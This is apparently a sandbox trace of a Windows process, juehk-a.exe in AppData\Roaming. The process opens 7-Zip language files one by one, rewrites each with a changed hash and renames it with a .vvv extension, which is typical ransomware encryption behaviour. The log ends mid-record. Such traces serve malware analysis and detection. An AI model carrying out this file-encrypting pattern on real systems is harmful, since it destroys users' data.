- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519766
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67146
- mode: rename
- sequenceNumber: 878
- filesize: 12190
- md5sum: d49e1041a64134e5ba5094c39eb038a0
- sha1sum: 9c524670e751263403f0c3bc98057dc6a64e263b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\nb.txt
- new_name: C:\Program Files\7-Zip\Lang\nb.txt.vvv
- ads:
- fid (ads:): 562949953519766
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67151
- mode: open
- sequenceNumber: 879
- value: C:\Program Files\7-Zip\Lang\ne.txt
- filesize: 21822
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519764
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67299
- mode: close
- sequenceNumber: 880
- value: C:\Program Files\7-Zip\Lang\ne.txt
- filesize: 22238
- md5sum: e88c7504cb38f263a3546344d0e6f305
- sha1sum: 56ab5293f58af90d7110cc9fc1a3505703c5387f
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519764
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67334
- mode: rename
- sequenceNumber: 881
- filesize: 22238
- md5sum: e88c7504cb38f263a3546344d0e6f305
- sha1sum: 56ab5293f58af90d7110cc9fc1a3505703c5387f
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ne.txt
- new_name: C:\Program Files\7-Zip\Lang\ne.txt.vvv
- ads:
- fid (ads:): 562949953519764
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67349
- mode: open
- sequenceNumber: 882
- value: C:\Program Files\7-Zip\Lang\nl.txt
- filesize: 14213
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519765
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67649
- mode: close
- sequenceNumber: 883
- value: C:\Program Files\7-Zip\Lang\nl.txt
- filesize: 14638
- md5sum: c9bef09005f197e43dc31c4da6f1e7c6
- sha1sum: 60edf45b0eed7d1e94bcee7689ca673db528885c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519765
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67659
- mode: rename
- sequenceNumber: 884
- filesize: 14638
- md5sum: c9bef09005f197e43dc31c4da6f1e7c6
- sha1sum: 60edf45b0eed7d1e94bcee7689ca673db528885c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\nl.txt
- new_name: C:\Program Files\7-Zip\Lang\nl.txt.vvv
- ads:
- fid (ads:): 562949953519765
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67671
- mode: open
- sequenceNumber: 885
- value: C:\Program Files\7-Zip\Lang\nn.txt
- filesize: 11500
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519767
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67769
- mode: close
- sequenceNumber: 886
- value: C:\Program Files\7-Zip\Lang\nn.txt
- filesize: 11918
- md5sum: 81f6813e70a3db76ad43d375b3e018cb
- sha1sum: d05091c1cd021b3e067a46f19a287464a94c7220
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519767
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67798
- mode: rename
- sequenceNumber: 887
- filesize: 11918
- md5sum: 81f6813e70a3db76ad43d375b3e018cb
- sha1sum: d05091c1cd021b3e067a46f19a287464a94c7220
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\nn.txt
- new_name: C:\Program Files\7-Zip\Lang\nn.txt.vvv
- ads:
- fid (ads:): 562949953519767
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67857
- mode: open
- sequenceNumber: 888
- value: C:\Program Files\7-Zip\Lang\pa-in.txt
- filesize: 22849
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519768
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67987
- mode: close
- sequenceNumber: 889
- value: C:\Program Files\7-Zip\Lang\pa-in.txt
- filesize: 23278
- md5sum: ffa6d7459acf66a001b7eb4af0da4a0d
- sha1sum: a1609711f5379aade24b2a956ff4a9d4d9896d29
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519768
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68006
- mode: rename
- sequenceNumber: 890
- filesize: 23278
- md5sum: ffa6d7459acf66a001b7eb4af0da4a0d
- sha1sum: a1609711f5379aade24b2a956ff4a9d4d9896d29
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\pa-in.txt
- new_name: C:\Program Files\7-Zip\Lang\pa-in.txt.vvv
- ads:
- fid (ads:): 562949953519768
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68035
- mode: open
- sequenceNumber: 891
- value: C:\Program Files\7-Zip\Lang\pl.txt
- filesize: 14102
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519769
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68049
- mode: close
- sequenceNumber: 892
- value: C:\Program Files\7-Zip\Lang\pl.txt
- filesize: 14526
- md5sum: d8d9b951c944bb0bb1a91471b07b7916
- sha1sum: 01fdb8ab9722d3fe5d2dc4b3441a884f8acd5bc6
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519769
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68063
- mode: rename
- sequenceNumber: 893
- filesize: 14526
- md5sum: d8d9b951c944bb0bb1a91471b07b7916
- sha1sum: 01fdb8ab9722d3fe5d2dc4b3441a884f8acd5bc6
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\pl.txt
- new_name: C:\Program Files\7-Zip\Lang\pl.txt.vvv
- ads:
- fid (ads:): 562949953519769
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68072
- mode: open
- sequenceNumber: 894
- value: C:\Program Files\7-Zip\Lang\ps.txt
- filesize: 15131
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519770
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68078
- mode: close
- sequenceNumber: 895
- value: C:\Program Files\7-Zip\Lang\ps.txt
- filesize: 15550
- md5sum: b323884844afcd0e27c61b28a07a70be
- sha1sum: 4c9e51cb585270f4e24adfb2b61b4ac033402699
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519770
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68085
- mode: rename
- sequenceNumber: 896
- filesize: 15550
- md5sum: b323884844afcd0e27c61b28a07a70be
- sha1sum: 4c9e51cb585270f4e24adfb2b61b4ac033402699
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ps.txt
- new_name: C:\Program Files\7-Zip\Lang\ps.txt.vvv
- ads:
- fid (ads:): 562949953519770
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68092
- mode: open
- sequenceNumber: 897
- value: C:\Program Files\7-Zip\Lang\pt-br.txt
- filesize: 13864
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519772
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68147
- mode: close
- sequenceNumber: 898
- value: C:\Program Files\7-Zip\Lang\pt-br.txt
- filesize: 14286
- md5sum: 417b4ba50ea17b6d968e4804e7bf089b
- sha1sum: ad9d8c5e7e7f3cb8b26b662c487425ad9a662360
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519772
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68154
- mode: rename
- sequenceNumber: 899
- filesize: 14286
- md5sum: 417b4ba50ea17b6d968e4804e7bf089b
- sha1sum: ad9d8c5e7e7f3cb8b26b662c487425ad9a662360
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\pt-br.txt
- new_name: C:\Program Files\7-Zip\Lang\pt-br.txt.vvv
- ads:
- fid (ads:): 562949953519772
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68160
- mode: open
- sequenceNumber: 900
- value: C:\Program Files\7-Zip\Lang\pt.txt
- filesize: 14007
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519771
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 68174
- repeat: 300
- sequenceNumber: 901
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 68305
- mode: close
- sequenceNumber: 902
- value: C:\Program Files\7-Zip\Lang\pt.txt
- filesize: 14430
- md5sum: 8a797eefd110503b66981fb357df36ee
- sha1sum: d2c771795a173ffd6f6e5f36a710f2962a80ba9d
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519771
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68408
- mode: rename
- sequenceNumber: 903
- filesize: 14430
- md5sum: 8a797eefd110503b66981fb357df36ee
- sha1sum: d2c771795a173ffd6f6e5f36a710f2962a80ba9d
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\pt.txt
- new_name: C:\Program Files\7-Zip\Lang\pt.txt.vvv
- ads:
- fid (ads:): 562949953519771
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68531
- mode: open
- sequenceNumber: 904
- value: C:\Program Files\7-Zip\Lang\ro.txt
- filesize: 13994
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519773
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68733
- mode: close
- sequenceNumber: 905
- value: C:\Program Files\7-Zip\Lang\ro.txt
- filesize: 14414
- md5sum: 260a837c58772bf909987c2e192ab4d5
- sha1sum: 6394657ebfb051fccbf9df80dba8523cd34ff6d0
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519773
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68759
- mode: rename
- sequenceNumber: 906
- filesize: 14414
- md5sum: 260a837c58772bf909987c2e192ab4d5
- sha1sum: 6394657ebfb051fccbf9df80dba8523cd34ff6d0
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ro.txt
- new_name: C:\Program Files\7-Zip\Lang\ro.txt.vvv
- ads:
- fid (ads:): 562949953519773
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68773
- mode: open
- sequenceNumber: 907
- value: C:\Program Files\7-Zip\Lang\ru.txt
- filesize: 19107
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519774
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69174
- mode: close
- sequenceNumber: 908
- value: C:\Program Files\7-Zip\Lang\ru.txt
- filesize: 19534
- md5sum: a2f5ee6028e34952ff349f58258ea825
- sha1sum: ac03b8ca0ba59ba4e663d6798821012cc239c64b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519774
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69182
- mode: rename
- sequenceNumber: 909
- filesize: 19534
- md5sum: a2f5ee6028e34952ff349f58258ea825
- sha1sum: ac03b8ca0ba59ba4e663d6798821012cc239c64b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ru.txt
- new_name: C:\Program Files\7-Zip\Lang\ru.txt.vvv
- ads:
- fid (ads:): 562949953519774
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69190
- mode: open
- sequenceNumber: 910
- value: C:\Program Files\7-Zip\Lang\sa.txt
- filesize: 28434
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519775
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69440
- mode: close
- sequenceNumber: 911
- value: C:\Program Files\7-Zip\Lang\sa.txt
- filesize: 28862
- md5sum: ca256e7a3ee106fbda45ea72aaaa40e5
- sha1sum: f4d19aa893a4ecf755b27eeca57542cb83f8a549
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519775
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69499
- mode: rename
- sequenceNumber: 912
- filesize: 28862
- md5sum: ca256e7a3ee106fbda45ea72aaaa40e5
- sha1sum: f4d19aa893a4ecf755b27eeca57542cb83f8a549
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\sa.txt
- new_name: C:\Program Files\7-Zip\Lang\sa.txt.vvv
- ads:
- fid (ads:): 562949953519775
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69507
- mode: open
- sequenceNumber: 913
- value: C:\Program Files\7-Zip\Lang\si.txt
- filesize: 25126
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519776
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69739
- mode: close
- sequenceNumber: 914
- value: C:\Program Files\7-Zip\Lang\si.txt
- filesize: 25550
- md5sum: 009ec5ae9589a891580e78687d435e4c
- sha1sum: 6d37ee7433e0f076f4dc6c454908983b82615545
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519776
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69753
- mode: rename
- sequenceNumber: 915
- filesize: 25550
- md5sum: 009ec5ae9589a891580e78687d435e4c
- sha1sum: 6d37ee7433e0f076f4dc6c454908983b82615545
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\si.txt
- new_name: C:\Program Files\7-Zip\Lang\si.txt.vvv
- ads:
- fid (ads:): 562949953519776
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69767
- mode: open
- sequenceNumber: 916
- value: C:\Program Files\7-Zip\Lang\sk.txt
- filesize: 14323
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519777
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69776
- mode: close
- sequenceNumber: 917
- value: C:\Program Files\7-Zip\Lang\sk.txt
- filesize: 14750
- md5sum: 8dd45d0b00d74b15cd2e3305b7ac8832
- sha1sum: 0ea9ed4a9538f73cc0c360ac30a812a4e722734a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519777
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69786
- mode: rename
- sequenceNumber: 918
- filesize: 14750
- md5sum: 8dd45d0b00d74b15cd2e3305b7ac8832
- sha1sum: 0ea9ed4a9538f73cc0c360ac30a812a4e722734a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\sk.txt
- new_name: C:\Program Files\7-Zip\Lang\sk.txt.vvv
- ads:
- fid (ads:): 562949953519777
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69791
- mode: open
- sequenceNumber: 919
- value: C:\Program Files\7-Zip\Lang\sl.txt
- filesize: 12419
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519778
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69796
- mode: close
- sequenceNumber: 920
- value: C:\Program Files\7-Zip\Lang\sl.txt
- filesize: 12846
- md5sum: 835b55e4349f7068443c27e87ce527e3
- sha1sum: cca195f1ecf88602b9c3a8b30e423fd52826a8d6
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519778
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69830
- mode: rename
- sequenceNumber: 921
- filesize: 12846
- md5sum: 835b55e4349f7068443c27e87ce527e3
- sha1sum: cca195f1ecf88602b9c3a8b30e423fd52826a8d6
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\sl.txt
- new_name: C:\Program Files\7-Zip\Lang\sl.txt.vvv
- ads:
- fid (ads:): 562949953519778
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69835
- mode: open
- sequenceNumber: 922
- value: C:\Program Files\7-Zip\Lang\sq.txt
- filesize: 11588
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519779
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69930
- mode: close
- sequenceNumber: 923
- value: C:\Program Files\7-Zip\Lang\sq.txt
- filesize: 12014
- md5sum: 280b2fbd26d9925f3686f60346f70249
- sha1sum: 5193813051365b70dca115dab792dace06716da3
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519779
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69952
- mode: rename
- sequenceNumber: 924
- filesize: 12014
- md5sum: 280b2fbd26d9925f3686f60346f70249
- sha1sum: 5193813051365b70dca115dab792dace06716da3
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\sq.txt
- new_name: C:\Program Files\7-Zip\Lang\sq.txt.vvv
- ads:
- fid (ads:): 562949953519779
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69986
- mode: open
- sequenceNumber: 925
- value: C:\Program Files\7-Zip\Lang\sr-spc.txt
- filesize: 19089
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519781
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70309
- mode: close
- sequenceNumber: 926
- value: C:\Program Files\7-Zip\Lang\sr-spc.txt
- filesize: 19518
- md5sum: b01647ce4c7d2e170dbdd41f7e8af941
- sha1sum: 3bfb16d4237668134edf98a331e3e68cb6262ed3
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519781
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70331
- mode: rename
- sequenceNumber: 927
- filesize: 19518
- md5sum: b01647ce4c7d2e170dbdd41f7e8af941
- sha1sum: 3bfb16d4237668134edf98a331e3e68cb6262ed3
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\sr-spc.txt
- new_name: C:\Program Files\7-Zip\Lang\sr-spc.txt.vvv
- ads:
- fid (ads:): 562949953519781
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70338
- mode: open
- sequenceNumber: 928
- value: C:\Program Files\7-Zip\Lang\sr-spl.txt
- filesize: 13378
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519780
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70366
- mode: close
- sequenceNumber: 929
- value: C:\Program Files\7-Zip\Lang\sr-spl.txt
- filesize: 13806
- md5sum: 0dd0e1bdf59f91c2a764c07b614e0a64
- sha1sum: 37d580e0f3ff69be44b33597182f7febd78e8f90
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519780
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70374
- mode: rename
- sequenceNumber: 930
- filesize: 13806
- md5sum: 0dd0e1bdf59f91c2a764c07b614e0a64
- sha1sum: 37d580e0f3ff69be44b33597182f7febd78e8f90
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\sr-spl.txt
- new_name: C:\Program Files\7-Zip\Lang\sr-spl.txt.vvv
- ads:
- fid (ads:): 562949953519780
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70382
- mode: open
- sequenceNumber: 931
- value: C:\Program Files\7-Zip\Lang\sv.txt
- filesize: 13743
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519782
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70500
- mode: close
- sequenceNumber: 932
- value: C:\Program Files\7-Zip\Lang\sv.txt
- filesize: 14158
- md5sum: bc2044bc16202eb3dae152e6f64c22b2
- sha1sum: f1a84e521020f5588e312fe847a452dfd779887b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519782
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70550
- mode: rename
- sequenceNumber: 933
- filesize: 14158
- md5sum: bc2044bc16202eb3dae152e6f64c22b2
- sha1sum: f1a84e521020f5588e312fe847a452dfd779887b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\sv.txt
- new_name: C:\Program Files\7-Zip\Lang\sv.txt.vvv
- ads:
- fid (ads:): 562949953519782
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70559
- mode: open
- sequenceNumber: 934
- value: C:\Program Files\7-Zip\Lang\ta.txt
- filesize: 20476
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519783
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70805
- mode: close
- sequenceNumber: 935
- value: C:\Program Files\7-Zip\Lang\ta.txt
- filesize: 20894
- md5sum: faca4398d99121b1d7c1822017a721e4
- sha1sum: 8112e0a97aaf559c062dbc5882673b43aa9ae600
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519783
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70866
- mode: rename
- sequenceNumber: 936
- filesize: 20894
- md5sum: faca4398d99121b1d7c1822017a721e4
- sha1sum: 8112e0a97aaf559c062dbc5882673b43aa9ae600
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ta.txt
- new_name: C:\Program Files\7-Zip\Lang\ta.txt.vvv
- ads:
- fid (ads:): 562949953519783
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70876
- mode: open
- sequenceNumber: 937
- value: C:\Program Files\7-Zip\Lang\th.txt
- filesize: 24112
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519784
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70902
- mode: close
- sequenceNumber: 938
